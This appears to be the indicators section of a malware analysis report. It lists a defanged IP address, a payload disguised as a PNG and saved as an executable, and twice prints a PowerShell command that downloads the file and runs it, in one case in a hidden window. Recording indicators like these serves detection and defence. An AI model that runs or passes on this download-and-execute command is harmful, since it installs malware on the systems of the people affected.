Technical Information
- http://10#.#44.79.123/i5/frdoc.png as %temp%\trdigl.exe
- '10#.#44.79.123':80
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://10#.#44.79.123/i5/frdoc.png','%temp%\trdigl.exe'); Start '%temp%\trdigl.exe'' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://10#.#44.79.123/i5/frdoc.png','%temp%\trdigl.exe'); Start '%temp%\trdigl.exe'